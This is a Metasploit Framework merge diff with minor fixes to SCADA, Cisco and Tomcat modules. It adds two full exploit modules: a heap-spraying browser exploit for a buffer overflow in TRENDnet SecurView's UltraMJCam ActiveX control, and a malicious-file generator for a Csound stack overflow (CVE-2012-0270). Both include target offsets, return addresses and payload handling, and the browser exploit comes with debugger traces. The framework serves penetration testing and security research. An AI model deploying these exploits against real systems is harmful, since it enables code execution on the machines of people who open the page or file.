Merge branch 'rapid7' into feature/4905

lib/msf/core/auxiliary/cisco.rb

@@ -282,8 +282,8 @@ module Auxiliary::Cisco
 
 				when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
 					user  = $1
-					stype = $2.to_i
-					shash = $3
+					stype = $3.to_i
+					shash = $4
 
 					if stype == 5
 						print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{shash}")

modules/auxiliary/admin/scada/modicon_command.rb

@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
 					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
 				],
 			'Version'        => '$Revision$',
-			'DisclosureDate' => 'Apr 5 2012',
+			'DisclosureDate' => 'Apr 5 2012'
 			))
 		register_options(
 			[

modules/auxiliary/admin/scada/modicon_password_recovery.rb

@@ -6,7 +6,6 @@
 ##
 
 require 'msf/core'
-require 'net/ftp' # TODO: Update this with a proper FTP server implementation
 
 class Metasploit3 < Msf::Auxiliary
 	include Msf::Exploit::Remote::Ftp
@@ -33,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
 					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
 				],
 			'Version'	=> '$Revision$',
-			'DisclosureDate'=> 'Jan 19 2012',
+			'DisclosureDate'=> 'Jan 19 2012'
 			))
 
 		register_options(
@@ -50,8 +49,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	end
 
-	# FIXME: This is required since there's no Rex Socket yet (will be
-	# part of a full FTP client implementation)
+	# Thinking this should be a standard alias for all aux
 	def ip
 		Rex::Socket.resolv_to_dotted(datastore['RHOST'])
 	end

modules/auxiliary/admin/scada/modicon_stux_transfer.rb

@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
 					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
 				],
 			'Version'        => '$Revision$',
-			'DisclosureDate' => 'Apr 5 2012',
+			'DisclosureDate' => 'Apr 5 2012'
 			))
 
 		register_options(

modules/auxiliary/dos/scada/d20_tftp_overflow.rb

@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
 					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
 				],
 			'Version'        => '$Revision$',
-			'DisclosureDate' => 'Jan 19 2012',
+			'DisclosureDate' => 'Jan 19 2012'
 			))
 
 		register_options(

modules/auxiliary/scanner/scada/koyo_login.rb

@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
 			'References'     =>
 				[
 					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
-				],
+				]
 		)
 
 		register_options(

modules/exploits/multi/http/tomcat_mgr_deploy.rb

@@ -132,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			:host   => rhost,
 			:port   => rport,
 			:sname  => (ssl ? "https" : "http"),
-			:user   => user,
-			:pass   => pass,
+			:user   => datastore['BasicAuthUser'],
+			:pass   => datastore['BasicAuthPass'],
 			:proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
 			:active => true
 		)
@@ -222,15 +222,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
 		end
 
-                report_auth_info(
-                        :host   => rhost,
-                        :port   => rport,
-                        :sname  => (ssl ? "https" : "http"),
-                        :user   => user,
-                        :pass   => pass,
-                        :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
-                        :active => true
-                )
+		report_auth_info(
+			:host   => rhost,
+			:port   => rport,
+			:sname  => (ssl ? "https" : "http"),
+			:user   => datastore['BasicAuthUser'],
+			:pass   => datastore['BasicAuthPass'],
+			:proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
+			:active => true
+		)
 
 		#
 		# EXECUTE

modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb

@@ -0,0 +1,201 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a vulnerability found in TRENDnet SecurView Internet
+				Camera's ActiveX control.  By supplying a long string of data as the sFilter
+				argument of the OpenFileDlg() function, it is possible to trigger a buffer
+				overflow condition due to WideCharToMultiByte (which converts unicode back to)
+				overwriting the stack more than it should, which results arbitrary code execution
+				under the context of the user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'rgod',   #Original discovery, PoC
+					'sinn3r'  #Metasploit
+				],
+			'References'     =>
+				[
+					[ 'OSVDB', '80661' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/18675/' ]
+				],
+			'Payload'        =>
+				{
+					'BadChars'        => "\x00",
+					'StackAdjustment' => -3500,
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction'         => "seh",
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ],
+					[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600', 'Ret' => 0x30303030 } ],
+					[ 'IE 7 on Windows XP SP3', { 'Offset' => '0x600', 'Ret' => 0x30303030 } ],
+					[ 'IE 7 on Windows Vista',  { 'Offset' => '0x600', 'Ret' => 0x30303030 } ]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Mar 28 2012",
+			'DefaultTarget'  => 0))
+	end
+
+	def get_target(agent)
+		#If the user is already specified by the user, we'll just use that
+		return target if target.name != 'Automatic'
+
+		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+			return targets[1]  #IE 6 on Windows XP SP3
+		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+			return targets[2]  #IE 7 on Windows XP SP3
+		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
+			return targets[3]  #IE 7 on Windows Vista
+		else
+			return nil
+		end
+	end
+
+	def on_request_uri(cli, request)
+		agent = request.headers['User-Agent']
+		my_target = get_target(agent)
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
+			send_not_found(cli)
+			return
+		end
+
+		# Set payload depending on target
+		p = payload.encoded
+
+		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
+		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+
+		# Convert the pivot addr (in decimal format) to binary,
+		# and then break it down to this printable format:
+		# \x41\x41\x41\x41
+		t = [my_target.ret].pack("V").unpack("H*")[0]
+		target_ret = ''
+		0.step(t.length-1, 2) do |i|
+			target_ret << "\\x#{t[i, 2]}"
+		end
+
+		js = <<-JS
+		var heap_obj = new heapLib.ie(0x20000);
+		var code = unescape("#{js_code}");
+		var nops = unescape("#{js_nops}");
+
+		while (nops.length < 0x80000) nops += nops;
+		var offset = nops.substring(0, #{my_target['Offset']});
+		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+
+		while (shellcode.length < 0x40000) shellcode += shellcode;
+		var block = shellcode.substring(0, (0x40000-6)/2);
+
+		heap_obj.gc();
+
+		for (var i=1; i < 0x1000; i++) {
+			heap_obj.alloc(block);
+		}
+
+		var ret = "";
+		for (i2=0; i2<30000; i2++) {
+			ret = ret + "#{target_ret}";
+		}
+		obj.OpenFileDlg(ret);
+		JS
+
+		js = heaplib(js, {:noobfu => true})
+
+		html = <<-EOS
+		<html>
+		<head>
+		<script>
+		</script>
+		</head>
+		<body>
+		<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj'></object>
+		<script>
+		#{js}
+		</script>
+		</body>
+		</html>
+		EOS
+
+		print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
+		send_response(cli, html, {'Content-Type'=>'text/html'})
+
+	end
+
+end
+
+=begin
+bp 1000f952 "r; g"
+bp kernel32!WideCharToMultiByte "r; dc poi(esp+c); .echo; g"
+
+eax=023f4bf4 ebx=1006519c ecx=00000003 edx=0013a170 esi=00038ce0 edi=00000000
+eip=7c80a164 esp=0013a130 ebp=0013a158 iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
+kernel32!WideCharToMultiByte:
+7c80a164 8bff            mov     edi,edi
+023f4bf4  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c04  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c14  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c24  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c34  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c44  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c54  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+023f4c64  00410041 00410041 00410041 00410041  A.A.A.A.A.A.A.A.
+
+ChildEBP RetAddr
+0013a12c 1000f958 kernel32!WideCharToMultiByte
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0013a158 100211d0 UltraMJCamX+0xf958
+0013e24c 77135cd9 UltraMJCamX!DllUnregisterServer+0xeb20
+0013e26c 771362e8 OLEAUT32!DispCallFunc+0x16a
+0013e2fc 10017142 OLEAUT32!CTypeInfo2::Invoke+0x234
+0013e32c 100170e2 UltraMJCamX!DllUnregisterServer+0x4a92
+0013e358 7deac999 UltraMJCamX!DllUnregisterServer+0x4a32
+0013e398 7deacfaf mshtml!InvokeDispatchWithNoThis+0x78
+0013e3d8 7deac9fc mshtml!COleSite::ContextInvokeEx+0x149
+0013e40c 75c71408 mshtml!COleSite::ContextThunk_InvokeEx+0x44
+0013e444 75c71378 jscript!IDispatchExInvokeEx2+0xac
+0013e47c 75c76db3 jscript!IDispatchExInvokeEx+0x56
+0013e4ec 75c710d8 jscript!InvokeDispatchEx+0x78
+0013e534 75c6fab8 jscript!VAR::InvokeByName+0xba
+0013e574 75c6efea jscript!VAR::InvokeDispName+0x43
+0013e598 75c76ff4 jscript!VAR::InvokeByDispID+0xfd
+0013e650 75c7165d jscript!CScriptRuntime::Run+0x16bd
+0013e668 75c71793 jscript!ScrFncObj::Call+0x8d
+0013e6d8 75c5da62 jscript!CSession::Execute+0xa7
+0013e728 75c5e6e7 jscript!COleScript::ExecutePendingScripts+0x147
+
+0:008> r
+eax=78f8f8f8 ebx=1006519c ecx=020bc038 edx=0c0c0c0c esi=020bf4d0 edi=020c0000
+eip=1003a0e9 esp=020bb140 ebp=020bf22c iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+UltraMJCamX!DllUnregisterServer+0x27a39:
+1003a0e9 8917            mov     dword ptr [edi],edx  ds:0023:020c0000=00905a4d
+
+
+The only application-specific component loaded is UltraMJCamX.ocx, but this
+can be unreliable and I'd rather not use that.
+=end

modules/exploits/windows/fileformat/csound_getnum_bof.rb

@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'Csound hetro File Handling Stack Buffer Overflow',
+			'Description' => %q{
+					This module exploits a buffer overflow in Csound before 5.16.6.
+				The overflow occurs when trying to import a malicious hetro file
+				from tabular format.
+				In order to achieve exploitation the user should import the malicious
+				file through csound with a command like "csound -U het_import msf.csd file.het".
+				This exploit doesn't work if the "het_import" command is used directly
+				to convert the file.
+			},
+			'License' => MSF_LICENSE,
+			'Author' =>
+				[
+					'Secunia', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'Version' => '$Revision: $',
+			'References' =>
+				[
+					[ 'CVE', '2012-0270' ],
+					[ 'OSVDB', '79491' ],
+					[ 'BID', '52144' ],
+					[ 'URL', 'http://secunia.com/secunia_research/2012-3/' ],
+					[ 'URL', 'http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f']
+				],
+			'Payload' =>
+				{
+					'Space' => 650,
+					'BadChars' => "\x00\x0a\x1a\x2c\xff",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
+					'DisableNops' => 'True'
+				},
+			'Platform' => 'win',
+			'Targets' =>
+				[
+					[ 'Csound 5.15 / Windows XP SP3 / Windows 7 SP1',
+						{
+							'Offset' => 132,
+							'Ret' => 0x6e955446 # push esp #  ret / libgcc_s_dw2-1.dll
+						}
+					],
+				],
+			'Privileged' => false,
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Feb 23 2012'))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The file name.', 'msf.csd']),
+			], self.class)
+	end
+
+	def exploit
+		sploit = rand_text(target['Offset'])
+		sploit << [target.ret].pack("V")
+		sploit << payload.encoded
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+		file_create(sploit)
+	end
+
+end